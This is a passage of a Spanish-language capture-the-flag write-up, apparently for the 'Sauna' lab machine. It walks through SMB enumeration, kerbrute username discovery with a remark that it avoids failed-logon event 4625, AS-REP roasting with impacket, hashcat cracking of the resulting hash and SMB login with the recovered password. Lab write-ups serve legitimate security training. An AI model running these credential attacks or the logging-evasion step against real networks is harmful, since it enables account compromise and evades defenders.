<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> ./username-anarchy --input-file listUsers.txt --select-format first,last,first.last,flast </span><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> users.txt</span></span></code></pre> 
<p>También añadiré Administrador al archivo.</p>
<h2 id="smb---port-445-recon">SMB - Port 445 Recon</h2>
<p>Me gusta usar crackmapexec para enumerar SMB.</p>
<p>Podemos ver el nombre de host, dominio y ver idf SMBv1 está habilitado.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> crackmapexec smb 10.10.10.175  </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [*] Windows 10.0 Build 17763 x64 </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">name:saunaNA</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">domain:EGOTISTICAL-BANK.LOCAL</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">signing:True</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">SMBv1:False</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span></code></pre> 
<p>No podemos ver ningun shares.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> crackmapexec smb 10.10.10.175 --shares</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [*] Windows 10.0 Build 17763 x64 </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">name:saunaNA</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">domain:EGOTISTICAL-BANK.LOCAL</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">signing:True</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">SMBv1:False</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [-] Error enumerating shares: STATUS_USER_SESSION_DELETED</span></span></code></pre> 
<p>A veces podemos intentar hacer una sesión nula para ver si conseguimos algo más. Una sesión nula es simplemente no proporcionar nada para el nombre de usuario y la contraseña. Pero todavía nada.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> crackmapexec smb 10.10.10.175 --shares -u </span><span style="color:#B5695999;--shiki-dark:#89DDFF">&#39;&#39;</span><span style="color:#393A34;--shiki-dark:#BABED8"> -p </span><span style="color:#B5695999;--shiki-dark:#89DDFF">&#39;&#39;</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [*] Windows 10.0 Build 17763 x64 </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">name:saunaNA</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">domain:EGOTISTICAL-BANK.LOCAL</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">signing:True</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">SMBv1:False</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [+] EGOTISTICAL-BANK.LOCAL</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\:</span><span style="color:#393A34;--shiki-dark:#BABED8"> </span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [-] Error enumerating shares: STATUS_ACCESS_DENIED</span></span></code></pre> 
<p>También podemos probar con otra herramienta llamada smbmap a ver si nos da algo diferente pero no lo hace.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> smbmap -H 10.10.10.175</span></span>
<span class="line"></span>
<span class="line"><span style="color:#999999;--shiki-dark:#89DDFF">[</span><span style="color:#393A34;--shiki-dark:#BABED8">+</span><span style="color:#999999;--shiki-dark:#89DDFF">]</span><span style="color:#393A34;--shiki-dark:#BABED8"> IP: 10.10.10.175:445        Name: 10.10.10.175 </span></span></code></pre> 
<h2 id="kerbrute">Kerbrute</h2>
<p>Ahora que tengo una lista de posibles nombres de usuario puedo utilizar una herramienta llamada kerbrute para probar y ver si alguno de los nombres de usuario son válidos.</p>
<p>Lo bueno de kerburte es que no crea el evento id 4625 en los logs. El evento id 4625 documentará cada log-on fallido. En su lugar se creará un evento Kerberos Failure id 4771, que no se registra por defecto.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> kerbrute userenum --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL listUser.txt</span></span>
<span class="line"></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">2024/02/18</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 09</span><span style="color:#B56959;--shiki-dark:#C3E88D">:31:07</span><span style="color:#AB5959;--shiki-dark:#89DDFF"> &gt;</span><span style="color:#B56959;--shiki-dark:#C3E88D">  Using</span><span style="color:#B56959;--shiki-dark:#C3E88D"> KDC</span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">s</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#B56959;--shiki-dark:#C3E88D">:</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">2024/02/18</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 09</span><span style="color:#B56959;--shiki-dark:#C3E88D">:31:07</span><span style="color:#AB5959;--shiki-dark:#89DDFF"> &gt;</span><span style="color:#2F798A;--shiki-dark:#F78C6C">  	10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175:88</span></span>
<span class="line"></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">2024/02/18</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 09</span><span style="color:#B56959;--shiki-dark:#C3E88D">:31:07</span><span style="color:#AB5959;--shiki-dark:#89DDFF"> &gt;</span><span style="color:#393A34;--shiki-dark:#BABED8">  [+] VALID USERNAME:	fsmith@EGOTISTICAL-BANK.LOCAL</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">2024/02/18</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 09</span><span style="color:#B56959;--shiki-dark:#C3E88D">:31:07</span><span style="color:#AB5959;--shiki-dark:#89DDFF"> &gt;</span><span style="color:#B56959;--shiki-dark:#C3E88D">  Done!</span><span style="color:#B56959;--shiki-dark:#C3E88D"> Tested</span><span style="color:#2F798A;--shiki-dark:#F78C6C"> 12</span><span style="color:#B56959;--shiki-dark:#C3E88D"> usernames</span><span style="color:#393A34;--shiki-dark:#BABED8"> (1 </span><span style="color:#B56959;--shiki-dark:#C3E88D">valid</span><span style="color:#393A34;--shiki-dark:#BABED8">) </span><span style="color:#1E754F;--shiki-dark:#89DDFF;font-style:inherit;--shiki-dark-font-style:italic">in</span><span style="color:#393A34;--shiki-dark:#BABED8"> 0.285 seconds</span></span></code></pre> 
<p>Ahora que tenemos dos nombres de usuario válidos podemos aprovechar algunas secuencias de comandos Impacket github. El que usé en esta máquina fue GetNPUser.py que hará un AS_REP Roast/Kerberoast.</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith </span></span>
<span class="line"></span>
<span class="line"><span style="color:#B07D48;--shiki-dark:#BABED8">$krb5asrep$23$fsmith</span><span style="color:#393A34;--shiki-dark:#BABED8">@EGOTISTICAL-BANK.LOCAL:bfa9cf66c4efa162cd18472a39b04966</span><span style="color:#B07D48;--shiki-dark:#BABED8">$5c796f89e55dfba2c4b0eccfa2b4198679aeddbfbddc37430a2bc75a49e472e05ccc330187a59c43f603b58e124e4c864c7d02d056056c6d782b32ca6156bb7b7b530effe162bdb7d7ce8470bebf8ce61238e23648957feed32538f0ee1f417c420243316ffb917605e649d42e249a5b2726a59ee9d2816edf045407b88dade504d12f41942faf1f244f5f29dc187e1c964677f66dc2e0160b6e56693f7f8a22816836215ecf22188e5024fb37f57e8e74b274d8eaa5b1296055ed33471620245ec1c7fb0653d0cd053156c314e181d0719c9f75c1032e3a4215c310378a1f3002ab5936223251ac1ea2190bf6fd74eb2c18e18067f186f1415533fddd6dea50</span></span></code></pre> 
<p>Ahora que tenemos un hash podemos utilizar hashcat para descifrarlo, hice esto en mi máquina host para utileze una GPU. obtenemos un éxito y ahora tenemos un creds fsmith</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> .</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\h</span><span style="color:#393A34;--shiki-dark:#BABED8">ascat.exe -m 18200 ..</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\h</span><span style="color:#393A34;--shiki-dark:#BABED8">ash ..</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\r</span><span style="color:#393A34;--shiki-dark:#BABED8">ockyou.txt --force</span></span>
<span class="line"></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">fsmith:Thestrokes23</span></span></code></pre> 
<h2 id="smb-pt2">SMB PT2</h2>
<p>Ahora que tenemos unas credenciales válidas fsmithpodemos intentar autenticarnos en SMB de nuevo usando crackmapexec y podemos ver que ¡tenemos credenciales válidas!</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [*] Windows 10.0 Build 17763 x64 </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">name:saunaNA</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">domain:EGOTISTICAL-BANK.LOCAL</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">signing:True</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">SMBv1:False</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [+] EGOTISTICAL-BANK.LOCAL</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\f</span><span style="color:#393A34;--shiki-dark:#BABED8">smith:Thestrokes23 </span></span></code></pre> 
<p>A continuación voy a enumerar acciones y una sobresale RICOH Aficio SP 8300DN PCL 6</p>
<pre class="shiki shiki-themes relative bg-neutral-200/30 dark:shadow-2xl code"><button aria-label="copy-button" class="copy-button absolute  z-20 top-2 right-2  rounded-md transition-all ease-in max-w-full max-h-fit dark:text-gray-600 text-gray-400 hover:text-indigo-500 dark:hover:text-indigo-400"><svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copy" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M8 8m0 2a2 2 0 0 1 2 -2h8a2 2 0 0 1 2 2v8a2 2 0 0 1 -2 2h-8a2 2 0 0 1 -2 -2z"></path> <path d="M16 8v-2a2 2 0 0 0 -2 -2h-8a2 2 0 0 0 -2 2v8a2 2 0 0 0 2 2h2"></path> </svg></button><span class="check-span absolute z-10 top-2 right-2  rounded-md transition-all ease-in opacity-0 text-green-600 dark:text-green-400 max-w-full max-h-fit "><svg class="icon icon-tabler icon-tabler-check" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round"> <path stroke="none" d="M0 0h24v24H0z" fill="none"></path> <path d="M5 12l5 5l10 -10"></path> </svg></span><code><span class="line"><span style="color:#AB5959;--shiki-dark:#89DDFF">&gt;</span><span style="color:#393A34;--shiki-dark:#BABED8"> crackmapexec smb 10.10.10.175 -u fsmith -p Thestrokes23 --shares</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [*] Windows 10.0 Build 17763 x64 </span><span style="color:#999999;--shiki-dark:#89DDFF">(</span><span style="color:#59873A;--shiki-dark:#FFCB6B">name:saunaNA</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">domain:EGOTISTICAL-BANK.LOCAL</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">signing:True</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span><span style="color:#999999;--shiki-dark:#89DDFF"> (</span><span style="color:#59873A;--shiki-dark:#FFCB6B">SMBv1:False</span><span style="color:#999999;--shiki-dark:#89DDFF">)</span></span>
<span class="line"><span style="color:#59873A;--shiki-dark:#FFCB6B">SMB</span><span style="color:#2F798A;--shiki-dark:#F78C6C">         10.10</span><span style="color:#B56959;--shiki-dark:#C3E88D">.10.175</span><span style="color:#2F798A;--shiki-dark:#F78C6C">    445</span><span style="color:#B56959;--shiki-dark:#C3E88D">    saunaNA</span><span style="color:#393A34;--shiki-dark:#BABED8">            [+] EGOTISTICAL-BANK.LOCAL</span><span style="color:#A65E2B;--shiki-dark:#BABED8">\f</span><span style="color:#393A34;--shiki-dark:#BABED8">smith:Thestrokes23 </span></span>
